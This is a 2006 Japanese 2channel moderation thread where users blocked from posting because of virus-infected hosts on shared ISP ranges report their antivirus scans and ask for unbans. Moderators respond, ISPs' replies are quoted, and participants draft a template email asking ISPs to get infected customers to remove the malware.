現在、2ちゃんねる掲示板管理者と協議の上、書き込み禁止の原因と思われるウィルス感染者に対し注意・対策
をお願いいたしておりますが、書き込み規制解除日程等の連絡は現状ございません。
SCN-NETといたしましては暫定的な対策方法をご用意いたしました、お手数お掛けいたしますが対策をご希望の
お客様は以下アドレスまで、お客様情報をご連絡いただきますよう宜しくお願いいたします。
(ご利用条件により対策をご案内できない場合もございます。)
E-mail: **************.scn-net.ne.jp
*2ちゃんねる掲示板規制対策希望 とお伝え願います。
又、今回の書き込み制限の原因となっているウィルスに関しましてはP2Pソフト(Winny,share等)を感染元と
する場合が多いようです、P2Pソフトのご利用に制限は行っておりませんが、ご利用には十分なご注意をお願い
いたします。
Winnyによる情報流出について
http://www.scn-net.ne.jp/*************/*******.cgi#1
(2006/08/11-13:02に投稿された記事が運営者により修正されています) どこに送ったんですかねー。
BBQですから、BBQ出来る人じゃないと解除できないんですけどねー。
とゆーか、返事が来てるんだとしたら、なんて返事をもらったんですかねー。
1週間ぐらい前から書き込みができません。
ウイルスは調べましたが出ていません。
風呂敷確認君で調べたところ、
BBQチェックだけ、BBQにされてますよ( ̄ー ̄)ニヤリッ と出ます。
そこのページに書いてあるように諦めるしかないのでしょうか?
ご回答よろしくお願いします。
>>489 じゃあreffiさんが対応しているようなので
reffiさんからのコメントを待ちます
>491
問い合わせ来ていましたが先方への返答まだしてなかったので
これから返答します。
>>487 をーなるほどー。
>>492 よろしくお願いしますー。
BBQチェックだけBBQにされてますよ( ̄ー ̄)ニヤリッと出ている場合は、何らかの事由(大量広告爆撃など)で規制されています。
諦めるのがいちばん早い解決法でしょう。。。
と、数日前から書き込みが出来ないのですが、こちらで何か良い方法を教えていただけないでしょうか。
トロイの木馬タイプのウィルスに感染し、デスクトップ画像がどこかのUPローダーに張られるウィルスでした。
現在は駆除済みです。
>>398 書く前にもう少しスレを読んで欲しいなぁ・・・
>496
>497
スレにきちんと目を通していませんでした。すみません。
ただ、先週末にウィルスを駆除したので、正確なことを覚えていません。
使用したアンチウィルスソフトはノートンのもので2005年版です。
ウィルス定義も最新のものです。
感染した当初2chで調べた時の記憶では、山田ウィルスと呼ばれていたものに感染していたと思います。
報告できるのはこの程度なのですが、これではやはりだめでしょうか。
また他に報告すべきことがあれば、記憶に残っている範囲でお答えしますのでよろしくお願いいたします。
>>498 ノートンの動作ログに記録が残っているはず。
そこから引っ張り出してください
>499
ありがとうございます。
NortonAntiVirusの活動ログを確認してみたのですが、
該当する日にち辺りのログの感染と書かれた項目が全て0になっていて、ウィルスの情報が見つかりませんでした。
この場合、私はウィルスに感染していなかったのでしょうか?
ウィルススキャンをした頃に、レジストリの中にあった何とかexeと書かれたものを削除したことは覚えているのですが、これも関係あるのでしょうか。
上記の何とかexeは、ウィルスによってもたらされた画像のコピーを止めるために削除しました。
このような内容で何か手がかりはつかめるでしょうか?
>>500 今一度スキャンした方が早いような気が。
あれば何か出てくるでしょうし、無ければ何も出てこないでしょうし。
>501
実は今日も定期的に行われるスキャンが終わったばかりのところなんですが、そのログにも何もありませんでした。
ウィルスには私は感染していなかったのでしょうか?
そうなると、なぜ2chに書き込みが出来なくなったのかわからなくなってしまいます・・・。
マイピクチャに、苺きんたまという名前のファイルがたくさん作られたりして大変だったのですが・・・。
>>502 キミと雑談するためにこのスレの人が動いているんじゃないんだよ♪
>503
すみませんでした。
もう少し勉強してみます・・・。
範囲焼きとやらは、せめて規制情報でお知らせした方が
いいんじゃないかしら。そんなふうに思った夏。
なにかを外に求めてるなら。
どこのホストを止めてるか判ればいいんじゃないですかねー。
個人的には、焼きの通常運用の範囲を超えちゃって
規制案件になっちゃってるなぁーと傍からみて思うです。>範囲焼き。
じゃ規制ってなんだろうーと思うですが、この話は置いといて。っと
で、この情報は秘しておく必要性はぜんぜん無くて、多分公開してた
方が、いろんなヒトが動きやすいんじゃないかと。(期限とかは非公開でしょうが。)
形はまあ、2chからのお知らせですよー、ってのが伝わればどうでもよくて。
なんか各々が連携とれなくて混乱してるみたいですし。
と部外者・野次馬desuga。m(_ _)m
質問も兼ねて。
使用したソフト「NortonAntiVirus 2006」
8/2の10時〜11時に規制されました。
「ウイルスにかかったのか心配な方は、○○(忘れてしまいました)をファイル名を指定して実行で……」
とか言われたので、実行したのが原因だと思われます。
すぐに強制終了をしたのですが、規制されてしまったのでダメだったぽいです。
違うところに質問したところ、「共有IPの巻き添えかも」との事。
Unix.Penguin(ノートントラップ?トロイの木馬)
Bloodhound.Exploit.6(トロイの木馬)
MHTMLRedir.Exploit
Wscript.KakWorm
VBS.Freelink.B
が検出されたので、検疫しました。
検疫は、もうウイルスの活動はなくなるってことで良いのでしょうか?
ウイルス定義は最新の物です。問題が無ければ解除を御願い致します。
質問、勘違いを沢山してしまい申し訳有りません。
>【DSBL】PROXY規制中!【報告無用】42
に誤爆して、スレ違いに気付か無かったため、同じ内容なのは御了承ください。
体験版の期限が切れたりして使用ソフトも変わってますが…。
>>509 山田ウイルスチェッカー.exeじゃないですか?
トレンドマイクロ
ウイルスバスターOn-Line Scan エンジン8.000-1001
パターン3.651.00
LAVASOFT
Ad-Aware SE Personal Build1.06r1
Definitions file SE1R118 07.08.2006
共に異常なし。解除宜しく
何にもカキコミしてないのに
公開プロキシ規制になってます^^;
解除お願いします。
>>511 繋ぎ替えていろんなホストから書き込みされているので
219.126.168.0/21範囲で焼かれています
巻き添えということでご不便をおかけしますがご理解を
tky*.flets.hi-ho.ne.jpのウイルス焼きの件でプロバイダーに対応要請だしたら
担当者に確認したらうちのホスト規制されてないとか言ってきたんですがいったいどうすれば
>>515 間違いなく焼いてるんですが規制情報板には書いてないから
そう仰ってるんでしょうね
219.126.168.0/21 は2006年07月30日(日)16時40分08秒にBBQ登録されています
ログつけてウイルス感染者がいるから特定して教えてあげて下さいって送って
うちのホストは規制されてないからルーター再起動でもしろって返されると
その辺うまいこと伝えるにはどう書けばいいか思い浮かばないorz
>>517 自分は、IP変えれば今の所書き込めるかも知れないけれど、
このまま放置していれば、感染者は繋ぎ変えを繰り返して、
規制される、IPが増えていく。
そういうことは、プロバイダ側では関知しないのか?
ウィルス感染で個人情報がどうのこうのと騒がれてる昨今、
貴社ではその辺の所をどう思っていて、どういう対処を取るつもりでいるのか。
それとも、一サイトの問題として放置するつもりなのか。
とかとか、倫理面で攻めると良いと思われ。
>>518 やっぱりそっち方面で攻めないと駄目なのね・・・
前回送ったのに付け加えてもう1回送ってみます
攻撃されたサーバーは、comic6.2ch.netだけですか?
>>521 そうですー。
同人板へのウイルスに感染したパソコンからの爆撃ですー。
どういうウイルスかは下記参照でー。
http://life.45.kg/sec/ 書き込み禁止になりまして2週間近くになりますが、
試験的にcomic6.2ch.net以外の2chサーバーへの書き込み禁止を
解除できませんか?
>523
システムが一括で規制かかるシステムですから無理じゃないかな。
>reffi@報告人 ★さん
scnユーザーです。
その後の経過を教えていただけませんか?
お盆中でお忙しいですかね…。
comic6.2ch.netへの攻撃は今も続いているのですか?
>527 BBM触れませんので分かりませんが、焼かれたとかではないですか?
>>528 携帯でもウイルス焼きってあるんですか?
無知ですいません
REMOTE_ADDR = 222.7.56.111
REMOTE_PORT = 20327
REQUEST_METHOD = GET
REQUEST_TIME = 1155571932
REQUEST_URI = /i2ch/env.php
HTTP_ACCEPT = application/octet-stream,application/vnd.phonecom.mmc-xml,application/vnd.wap.wmlc;type=4365,application/vnd.wap.xhtml+xml,application/xhtml+xml;profile="
http://www.wapforum.org/ xhtml",image/bmp,image/gif,image/jpeg,image/png,image/vnd.wap.wbmp,image/x-up-wpng,multipart/mixed,multipart/related,text/css,text/html,text/plain,text/vnd.wap.wml;type=4365,application/
x-smaf,application/vnd.yamaha.hv-script,audio/vnd.qcelp,application/x-tar,application/x-mpeg,video/3gpp2,audio/3gpp2,video/3gpp,audio/3gpp,text/x-vcalendar,text/x-vcard,application/
x-shockwave-flash,application/x-atokdic,application/x-up-download,application/x-kddi-ezmusic,application/x-kddi-playlist,image/bci,application/x-kmcs-form-data,application/x-www-form-urlencoded,text/x-hdml,*/*
HTTP_ACCEPT_CHARSET = shift_jis,*
HTTP_ACCEPT_LANGUAGE = ja-jp
HTTP_CONNECTION = close
HTTP_HOST = i2ch.net
HTTP_REFERER =
http://i2 >529 ごめんなさい、BBM詳しくないので分からないですけど ウィルス警報。。。何とか
って出ました!?
>>529 ERROR:ウィルス警報。。。ってのがでてきます
>531 えと。。。BBM詳しい方が見ますと何かわかると思うのですが、
恐らく焼かれていると思います。
>>536 おそらく広告荒らしとして焼かれた
URL貼って同じこと数回書き込めば規制対象
>>536 携帯の機種固有番号書いてみ
電池のところに書いてあるだろ
>>537 そうゆうのも無いんだよww
オフ板で打ち合わせしてただけ
あなたのことだから、あなたがやらなければ前には進まんよ
今のままなら永久規制だな
キャリアによって違うかもだけど、ドコモは固有番号=製造番号だったような
>>544 FOMAなら「35」で始まる番号、auなら「05」で始まる番号が書いてあるはず
>>548 それそれ
後はリスト見れる人が来るのを待っていればいいよ
>>554 警察署の中で刃物を振り回す のと同じかと
つまり、現行犯で焼かれた
comic6.2ch.netへの攻撃は今も続いているのですか?
>>556 まさか警察署に飛ばされてるとは思わなんだ
なんかもう、リカバリしちゃいました。
解除のほうよろしくお願いします。
tky*.flets.hi-ho.ne.jpから、
comic6.2ch.netへの攻撃は今も続いているのですか?
>>562 感染者がウイルスを駆除したことが確認されない限り、
解除はないかと。
もしくはプロバイダから感染者へ駆除するように通達がいったとか。
いえ、解除して欲しいから言っているのではなく、(他のISPを使えるので)
純粋にまだ、hi-hoから攻撃が続いているのか知りたいだけです。
どうなのでしょうか?
>>564 続いてますー。
全てを範囲焼きしてませんからー、時々抜けてきますしー。
プロバイダにメールしていただけると有り難いですー。
klistのURL添えてー。
>>561です。
今朝、丁度良く?PCが逝ってしまったのでリカバリしました。
その後、念のため『Norton AntiVirus 2006』でスキャンしましたが、ウイルス・スパイウェア等は見つからず。
解除の方宜しいですか?思いっきりスルーされたので。
それと、定義は最新の06/8/14です。
>567 あらら。。。リカバリーしちゃったのですね。
では解除しますね
>567 解除しました。20分ほど待ってみてください。
465ですがプロバイダより下記の返事を頂きましたので解除を御願いして頂けませんでしょうか?
お手数掛けますが宜しく御願いします。
平成 18年 8月 15日
×××様
拝啓 時下ますますご清栄のこととお慶び申し上げます。
平素は格別にご厚情を賜り、あつく御礼申し上げます。
Web-KKM サポートセンターの××と申します。
××様は書かれました。
>先週の日曜位より普段使用している、2ちゃんねる掲示板サイトにおいて書き込みが出来なくなりました。その旨を質問したところ、
このホストを共有している誰かがウィルス感染していると言う事でウィルス焼きされているという事です、よってウィルスホストに対
して対応して頂けませんか?詳しくは下記です
>
http://halcyan.30.kg/klist/list.php?filepattern=106-8-&kwd_sv=sakura03&kwd_host=nat.kkm.ne.jp >
>お手数を掛けますが宜しく御願いします。
上記につきまして、対象ユーザ様よりウィルス対策実施の報告を頂きました今後とも宜しくお願いいたします。
>>571 プロバイダさんとのやり取りお疲れ様でした
nat.kkm.ne.jp のBBQ登録を解除しました
全板に書き込めるようになるまで30分ほどかかるかと思いますので
しばらくお待ちください
※万が一再発があった場合は再度登録されることになりますのでご承知おきください
>>573 こちらこそ本当にありがとうございました。
感謝致しますm(_ _)m
自分も再発等が無い様対策には特に注意します
やべ、ボタンをクリックするの忘れてたごめんなさいごめんなさい・・・
すいませんもうちょっとだけ待っててください
もうちょっとすれば書けます
上の方でもどなたかが質問なさってましたが
scn-netはその後どうなっているのでしょうか?
解除はまだ当分無理でしょうか?
えと、プロバイダさんの回答が確認出来た時点で判断をして
解除なんですけど。。。そう言えばまだ来ていないですね。。。
>576 こちらからプロバイダさんにログ送っているようですから
プロバイダさんの対応がまだなのかもですね。。。
ユーザーさんのどなたかが、プロバイダさんに問い合わせてくれるといいのですが。
http://qb5.2ch.net/test/read.cgi/sec2chd/1145344117/492 一応、ウィルス感染者の一部には警告をしたと言うメールはもらいました。
ただ、すぐ対応できるわけではないみたいです。
後、一応scn-netの掲示板に対処法?の問い合わせ方法が書いてあります。
実際、自分は試してないのでその対処法が有効なのかは謎ですね。
以下一部抜粋
感染者に対し警告、場合によってはご利用について制限を行い2ちゃん
ねる掲示板へのウィルスの活動量を減らすようにしております。
解除については最終的には2ちゃんねる掲示板管理者様のご判断によ
るところなりますので、弊社側だけでは解除の日程についてお約束をす
る事は出来ません。
ご了承の程よろしくお願いいたします。
>579 了解しました。どうしましょうか、プロバイダさんが対応してくれているようですので
試しに一旦解除してみて様子をみてみましょうか。ウィルス投稿が解除後に確認されま
すと再び焼かれることになります事をご了解してください。
>579 解除しました。20分ほど待ってみてください。
ふむ
解除されたのはwhite1.scn-net.ne.jpだけかもしれません
white5.scn-net.ne.jpはまだ規制されてます
2・3・4というものがあるのかは調べてませんがそちらはそもそも規制されてないようです
野焼きさんのご判断もありますし
それを尊重してwhite5.scn-net.ne.jpの方も解除してみました
やったーーーーーーーーーーーー
書き込めました。
ありがとうございました。
@niftyに
http://halcyan.30.kg/klist/list.php?filepattern=-106-8-&kwd=&kwd_sv=&kwd_host=acoska&kwd_post= のURLを示して対応依頼のメールを先ほど出しましたです。
以前2度程出して、1回目は返事が来たのですが2回目は来ませんでした。
今回も来るかどうか分かりませんがとりあえずご報告させていただきます。
>>588-589 こちらの方がいいかも。過去ログにも目を通してみてください。
"e-catv.ne.jp"には見覚えがありますです。
【DSBL】PROXY規制中!【報告無用】42
http://qb5.2ch.net/test/read.cgi/sec2chd/1154777583/l50 @niftyに追加で"なんらかの連絡を下さい"とメールを送っておきましたです。
>583 そちらは見落としていました。すみませんすみませんm(_ _)m
わほーい書き込めました!
お手数掛けました。ありがとう、野焼きさん生姜焼きさん!
>>594 いえいえとんでもないです
>>595 長いこと巻き添えでご不便おかけしました
Q.ウイルス爆撃で2ch規制されてるから感染者特定してウイルス感染してるって教えてあげてくれませんか?
A.うちのホスト規制されてないよ
↓
Q.確かに規制されてるんだけどとりあえずそれ置いといて感染者にウイルス削除するように言ってくれないかな?
A.いやだからうちのホスト規制されてないって
本題はウイルス感染者の特定なのに規制されたされてないから話進まないで俺はいったいどうすればorz
>>597 > .ウイルス爆撃で2ch規制されてるから
って書くからじゃないかな?
簡単にまとめたからそんな感じでプロバイダ送ったのにはウイルス爆撃してるとは書かずに
ウイルス感染してる人が個人情報含む書き込み2chに連投してばら撒いてるから教えてあげて程度の表現に
東京、フレッツADSL以外は、書き込み禁止になっていないから、
その担当者の言っていることは間違いとは言えない。
読むことはできるのだから、どうしても書込みたいときは携帯で十分だし、
この際2chをやめるというのも手だと思う。
自分に全く責はないのに、いちいち、ウイルス感染者が出るたびに、
ここにお伺いをたて、ISPに対し交渉めいたことをするのは、時間の浪費だと個人的には思う。
プロバイダーから「調査・対応させていだだきます」という
返信メールをいただいたのですが、未だ爆撃は止まないのでしょうか?
>>597 ウイルスにより、2chが攻撃されてるとか書いてみるとか
つい先ほど、@niftyメールサポートセンターよりメールが来ました。
会員規約に基づきアカウント(会員)の特定と対応を行ったとの事です。
使用したソフト:ノートンアンチウィルス2006
ウイルスファイル定義:06/08/16
ウイルス名:Trojan.upchan
以上で規制解除をお願い出来ますでしょうか?
607ですが、上記のウィルスは駆除済みです。
言葉足らずでスミマセンでした。
>608 えと、見つかって駆除済みのようですので解除しますね。
>608 解除しました、20分ほど待ってみてください。
>610
解除されました。
ありがとうございました!!
>>597さん乙です。
自分も昨日Hi-hoに対処をお願いするメールを出しました。
その時にklistのURL、ここと焼き処のURLを添えて、「スレッド内をhi-hoで
検索すれば、2ちゃんねるのサーバーがアタックされたこと、それに運営側が
対処したこと、巻きぞいで困っている人が相談していることがわかると思います」
という旨書き添えました。現在返事まち。
それでも「うちのホスト規制されてない」とか返事来たら…プロバイダノリカエマス(´・ω・`)
あの〜〜〜、うちのプロバイダーから連絡はありましたでしょうか?
未だ爆撃は止まないのでしょうか?
>615 えとこのスレをsechttpで検索してみてください。
あ、またやっちゃたぽ、こっちでした。 _| ̄|○
sechttpで下記のスレッド検索してみてください。
【DSBL】PROXY規制中!【報告無用】42
http://qb5.2ch.net/test/read.cgi/sec2chd/1154777583/ >>613 人任せにしてない?ちゃんと自分で連絡した?
グローバルIPもらえるはずだけど
感染者の特定不可能ってのが猫側の話だから
猫が直接2chとは掛け合わないと思うけどね
したとしても、特定できないってプロバが言ってるんだから
解除もされないと思う
>>619 613さんではありませんが自分のとこは
グローバルIPにしたりプロバを変える事ができません
(自分には権限がありません)
そのような立場の人はもう諦めろって事なんでしょうか・・・
>>619 大変恐縮でございますが、お客様より頂戴いたしました情報を
もとに、弊社にて調査・対応させていただきますので、お困り
のところ、誠に申し訳ございませんが、規制解除までしばらく
お待ちいただきますようお願い申し上げます。
こういう返信メールを頂いております
もうずいぶん前から公開プロキシで書き込めないと出ます。
串は刺していないし、ポートも確認したら問題はありませんでした。
これはどうすればいいのでしょうか?
フジ改編を考える Part8 より
http://tv8.2ch.net/test/read.cgi/tvsaloon/1152781801/ 453のレスを叩いたひと→457
476のレスを叩いたひと→480
604のレスを叩いたひと→609
さらにフジ改編のスレで書き込んだ609の人は、HEY!スレより
http://tv8.2ch.net/test/read.cgi/tv/1153741800/より 200と204のレスをフジ改編のスレでIDを晒して叩いている
http://tv8.2ch.net/test/read.cgi/tvsaloon/1152781801/609の人のレスは、
被害者604のレスを叩くのにトリック(ウイルス?)を使った可能性が高い!
東京フレッツADSLを利用する者です。
7月12日を最後に2chには書き込んでいなかったのですが、
今日書き込もうとしたら、公開〜(1)と出ました。
踏み台〜で確認したら、BBQが黒こげでした。(他は大丈夫)
チャートで解説4に辿り着き、ノートンでオンラインスキャンしたところ
9個のウイルスが見つかりました。
・Unix.Penguin(6個)
・VBS.Freelink.B
・Bloodhound.Exploit.6
・VBS.LoveLetter.A
すべてかちゅ〜しゃのログだったので、該当ログを削除しました。
その後オンラインスキャンを行ったところ、検出されなくなりました。
解除をお願いしたいのですが、
もしかして上の書き込みのhi-ho規制は私のせいでしょうか?
だとしたら本当に申し訳ないです・・・。
>>625 >すべてかちゅ〜しゃのログだったので、該当ログを削除しました。
専ブラのログファイルだったら、ウィルス感染じゃなくて単なる「ウィルスコード」だけかと。
>>626 レスdです。
という事は誤反応で、ウイルス感染自体はしていないのですね。
じゃあ私も範囲焼きに含まれてるって事でしょうか。
>>627 >>511あたりからじっくり読んでみるといいと思うです。
>>628 ありがとうございます。把握しました。お手数おかけいたしました。
>>614 すみません今気が付きました、ありがとう
http://sports2.2ch.net/test/read.cgi/operatex/1154774392/491 >平素はhi-hoをご利用いただき、誠にありがとうございます。
>先日2ちゃんねる管理者に問い合わせを行ないましたところ
>規制を行なっていないとの報告をいただいております。
規制を行なっていないと回答した2ちゃんねる管理者は、誰ですか?
*.hi-ho.ne.jp みたいなhi-no全体が規制されるようなもんじゃなくて一部のIPが規制されてるだけじゃないの。
愛媛catvの解除はまだでしょうか?
感染者のウイルス削除が終わったそうです
愛媛CATVを利用している者です
ようやくプロバイダからウイルス駆除のメールが届いたので報告します
以下 本文より抜粋
>いつもご利用誠にありがとうございます。愛媛CATVと申します。
>弊社サービスの一部利用者がウィルスに感染し、
>お客様をはじめ他の利用者の皆様にご迷惑をおかけしていた件についてですが
>該当ユーザにウィルス駆除を依頼し、駆除が完了したという報告を
>受けましたのでご連絡させていただきます。
>お客様から頂戴した情報により、ウィルスの駆除まで至ったことにお礼申し上げます。
との事です。これで解除できるのならばよろしくお願いします。
>>633-634 > family.e-catv.ne.jp
解除致します
>>635 > family.e-catv.ne.jp
解除致しました。
ウイルスチェックしたソフト名 ウイルスバスター
ウイルス定義ファイルのバージョンか日付 8月23日
5日ぐらいに山田ウイルスか何かに感染。駆除しました。
それ依頼書き込みできません
>>639 駆除したウイルス名の記載もお願いします
631 : [―{}@{}@{}-] tky6-p247.flets.hi-ho.ne.jp:2006/08/22(火) 18:54:15 ID:B621Vl6R0
http://sports2.2ch.net/test/read.cgi/operatex/1154774392/491 >平素はhi-hoをご利用いただき、誠にありがとうございます。
>先日2ちゃんねる管理者に問い合わせを行ないましたところ
>規制を行なっていないとの報告をいただいております。
規制を行なっていないと回答した2ちゃんねる管理者は、誰ですか?
これについてはどうなってんの?
>>643 プロバがsecurity@に送信して確認とっているならreffiさんじゃない?
規制云々じゃなくて2chを攻撃してるユーザがいるって直接言えばいいのに
ウイルスの件だけ言っても一度規制の件で問い合わせてると規制されてないって答えが返ってくる素敵なhi-ho
>>646 「このIPで書き込み出来ない」って具体的に伝えてる?
お前さんが原因でなく、かつ共有IPではないなら、それは繋ぎ替えで変わるIPだから
それで対処すればいいじゃん。
>>644 > プロバがsecurity@に送信して確認とっているならreffiさんじゃない?
ハイホーには、誰に連絡を取るように言えばよいのですか?
niftyの時電話したらメールでも一回問い合わせろって言われてたから誰もしてないかもな
hi-hoからの問い合わせメール確かに来てました。
単に一々返答するが大変になってきたので書いてなかっただけです。
(僕はウィルス担当ではありませんし)
僕に問い合わせても単にここに問い合わせがあったことを転送するだけなので
プロバイダに問い合わせする際はこのスレッドに誘導して下さいm(__)m
>>654 それがどうして「規制を行なっていないとの報告」になるんですか?
約一週間前に苺キンタマを踏んで規制されました
原因のファイルを削除してavast!ウイルススキャン4.7でスキャンしました
解除おねがいします
tky9なんてうちのほうつながらないよ・・・・・
マジでウィルス気づけって
Your IP address is 219.104.200.138
Your RemoteHost is ntkngw064138.kngw.nt.adsl.ppp.infoweb.ne.jp
使用ソフト ウィルスバスター2006
発見ウィルス HTML_SUAR.A(隔離後削除)
よろしくおながいします
>>660 他に見つからなかったかな?何か違うっぽい気がするけど。
Your IP address is 219.104.200.138
Your RemoteHost is ntkngw064138.kngw.nt.adsl.ppp.infoweb.ne.jp
使用ソフト AVGフリー
発見ウィルス Trojan horse generic.YRT(亀田ウィルス。隔離後削除)
一月前に踏んでたみたい。
もう一度ウィルスバスターで再スキャンかけて何もでなかったし、大丈夫だと思う。
よろしくおながいします。
>Trojan horse generic.YRT(亀田ウィルス。隔離後削除)
>>664 > ntkngw064138.kngw.nt.adsl.ppp.infoweb.ne.jp
解除致します。
>>665 > ntkngw064138.kngw.nt.adsl.ppp.infoweb.ne.jp
解除致しました。
JAVA_BYTEBER_AC
JAVA_BYTEBER_AB
JAVA_BYTEBER_A
ファイル削除しました。
解除お願いします。
IP変えても黒コゲのままです
ひょっとして広域誤爆ですか?
今sechttpでも書けるようになったんですが
時間がたったからいったん解除したってだけですよね?
>671 えと、ですね。。。
*.oita.nttpc.ne.jp (210.153.217.0/24) が範囲で焼かれているようです。
プロバイダさんにウィルス感染ホストを調査してもらってユーザーさんに
駆除を要請してもらえますように、要請してみてください。
http://halcyan.30.kg/klist/list.php?filepattern=106-8&kwd_sv=comic6&kwd_host=.oita.nttpc.ne.jp&sort=date >>674 【BBQ&BBM16本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1153918305/932 >あと以下を薬物宣伝荒らしで焼きまくり。
>p11242-ipbffx02hodogaya.kanagawa.ocn.ne.jp
>>677 ウィルス貼ってる奴は規制しないんだ
通報するので
>>675のウィルスを貼った奴のIP教えろや
>>673 >>671ですが、昨日プロバに調査依頼出しておきました。
状況改善されたら解除宜しくおながいします。
BBQにされていますね。さてどうしましょ。。になっています。
どうすれば宜しいでしょか?
ご教示よろしくお願いいたします。
お疲れ様です
http://qb5.2ch.net/test/read.cgi/sec2chd/1156481591/842- についてこちらを利用させていただきます。
管理者 又は 代理人からプロバイダへの連絡を想定したテンプレです。
とりあえずテキトーに書いてみたのでみんなで添削していきましょう
テンプレが決まれば、それを土台にして「ユーザーからのプロバイダへの連絡メール」のテンプレも作れるかと。
次レスにコピペ↓
×× ご担当者様
お世話になります。
2ちゃんねる掲示板のウイルス対策規制報告を担当しております、××と申します。
既にユーザーの方がご報告されたそうなのですが、
貴社より「サイトの管理者よりご連絡ください」といった内容の返信を受けられたそうです。
上記の経緯より当掲示板上
(お願いアドレス)
にて要請がありましたので御報告させていただきます。
当サイトにおいて
xxx.xxxx.xxx.ne.jp
より、ウイルス感染が原因と見られる当サイトへの攻撃を検出いたしました。
このウイルスは
(ウイルスの説明・どっかのURL引用して説明すれば良いと思われ)
このウイルスによる連続投稿などの結果、当掲示板のサーバや回線は無用な負荷
を強いらます。
その為、当サイトでは検出されたホストに対して利用制限規制を行い、ウイルスの対策としております。
固定アドレスではないプロバイダ様につきましては、IPアドレスが流動的に変わ
りますので、それに備えたxxx.xxx.jpといった正規表現にて規制せざるを得ません。
当方と致しましては該当感染ユーザーの方にウイルス駆除等対応して頂き、当サ
イトへの攻撃終結を確認させて頂くまでは
「巻き添え」という形で利用制限を強いられている、今回要請されたユーザー様
のような方々が多数いらっしゃいましても我慢して頂くしかない、というのが現
状です。
また、当サイトからは感染ユーザー様を特定し連絡を差し上げるといった方法も
不可能です。
そこで、
当サイトより、攻撃のあった時間・ホスト等を記載したログを提示させていただ
きますので
貴社より該当ユーザー様へ感染事実をお知らせし、ウイルス駆除などの対応をお
願いしていただけないか、と今回ご連絡させて頂きました次第で御座います。
ご協力いただけるのであれば
以下が時間およびIPアドレス,リモートホスト一覧のログとなりますので御参照
ください。
(klistのログ)
あとは適当に
参考URLとかあればココに↓な感じで
------
参照URLは下記になります。
例えば
ウイルス情報
http:// 当サイトへの代理人要請レス (同
じゃあ、送りますよ、と宣言したレスURL
※この通報メールは上記の場所で宣言され、正式な手順に基づいて作成されています。
とか
---------
あとは署名とか
利用制限規制は、書き込み拒否の方が分かり易いかもしれません
あとはウイルス規制を念頭において書いたので
焼き全般に適用させるならば
ウイルス対策規制報告担当を焼き全般で外部向けに分かるような名称に変更という事で
まー、通報になるよーなのはウイルスだけですねー。
焼き全般で通報相当のものって特に無いと思いますー。
>>689 プロバ串は通報せずに
どんどん焼くってことですか?
>>686 >当サイトにおいて
>xxx.xxxx.xxx.ne.jp
↑はklistにひかかってる該当ログ全部書くですか?
結構な量になるのでは…
あと、
>また、当サイトからは感染ユーザー様を特定し連絡を差し上げるといった方法も
>不可能です。
これはISPさんも理解していると思うので必要ないかもとか。
>既にユーザーの方がご報告されたそうなのですが、
既にユーザーの方が御連絡されたそうなのですが、
>攻撃を検出いたしました。
攻撃という表現は人によっては違和感を感じるかも
>また、当サイトからは感染ユーザー様を特定し連絡を差し上げるといった方法も
特定し御連絡を差し上げるといった方法も
あとは大事なのを忘れてましたが
対応があるまで規制を継続、という文言は必要でしょうね
対応後はユーザーからスレに書いてもらうのか、プロバイダから連絡してもらうようにお願いするのか
というのも入れないといけないと思います。
>686
>当サイトにおいて
>xxx.xxxx.xxx.ne.jp
>より、ウイルス感染が原因と見られる当サイトへの攻撃を検出いたしました。
当サイトにおいて
下記記載の貴社ホスト
より、ウイルス感染が原因と見られる当サイトへの攻撃を検出いたしました。
>>691 そこは一つだけ抜き出して(ログより一部抜粋)とか臨機応変に
>固定アドレスではないプロバイダ様
固定アドレスではないと推測されるホスト
ですな。
こうしとくと固定ならプロバイダから「固定です」と連絡くるでしょうか
>>696 固定アドレスではないか、と思われる(推測される)
です
>>690 ウイルスからの書き込みで焼いた場合は
通報じゃないですかねー。
それ以外にプロバ串焼く理由って何ですかー?
>>695 ひとつだけ抜粋とかよりもklistのリモートホスト一覧リンクをつけたほうが
スマートな気が。
すんげくスマートにしてみたver.----
×× ご担当者様
お世話になります。
2ちゃんねる掲示板のウイルス対策規制報告を担当しております、××と申します。
既に貴社ユーザー様からのご連絡があったかと存じますが、当掲示板において
貴社のリモートホストより、ウイルス感染が原因と見られる連続投稿を試みる
迷惑行為を検出しましたのでご報告します。
このウイルスは
(ウイルスの説明・どっかのURL引用して説明すれば良いと思われ)
迷惑行為が行われたサーバ・時間・リモートホスト一覧は下記をご参照ください。
(klistURL)
このウイルス感染による連続投稿は、当掲示板のサーバや回線は無用な負荷を強いるものであり
大変迷惑しております。
現在、当掲示板では迷惑行為を排除するため、正規表現で
***.***.***.***
に相当するすべてのリモートホストからの書き込みを拒否する規制を行っており、貴社より
「同ユーザー様からの同様な行為がないことを保証していただけるまで」この規制を
継続させていただく旨、ご連絡いたします。
貴社におかれましては、該当するユーザー様から二度と同様の行為が行われないよう、
該当ユーザー様へ感染事実をお知らせし、ウイルス駆除などの対応をお願いしたく存じます。
また、このメール及び、貴社よりの返信等、事態の経過に関しては、当掲示板サイトにて
公表させていただく場合があります。あしからずご了承ください。
※既に同内容のメールを受信されていた場合、こちらの手違いですのでお手数ですが
当メールは削除してください。
※当掲示板からの正式な通報には、CC欄に
[email protected]が追記されていますので
御確認願います。
※返答には必ずCCに
[email protected]を付けて下さるようにお願いします。
これが無い場合は正式な返答とは認めませんのでご了承下さい。
2ちゃんねる掲示板
http://www.2ch.net/ [email protected] 規制報告担当:(hoge)
[email protected] あ、作成宣言忘れてたです。
×× ご担当者様
お世話になります。
2ちゃんねる掲示板のウイルス対策規制報告を担当しております、××と申します。
既に貴社ユーザー様からのご連絡があったかと存じますが、当掲示板において
貴社のリモートホストより、ウイルス感染が原因と見られる連続投稿を試みる
迷惑行為を検出しましたのでご報告します。
このウイルスは
(ウイルスの説明・どっかのURL引用して説明すれば良いと思われ)
迷惑行為が行われたサーバ・時間・リモートホスト一覧は下記をご参照ください。
(klistURL)
・問題点
このウイルス感染による連続投稿は、当掲示板のサーバや回線は無用な負荷を強いるものであり
大変迷惑しております。
参照URLは下記になります。
例えば
ウイルス情報URL
メール作成宣言URL
※この通報メールは上記の場所で宣言され、正式な手順に基づいて作成されています。
現在、当掲示板では迷惑行為を排除するため、正規表現で
***.***.***.***
に相当するすべてのリモートホストからの書き込みを拒否する規制を行っており、貴社より
「同ユーザー様からの同様な行為がないことを保証していただけるまで」この規制を
継続させていただく旨、ご連絡いたします。
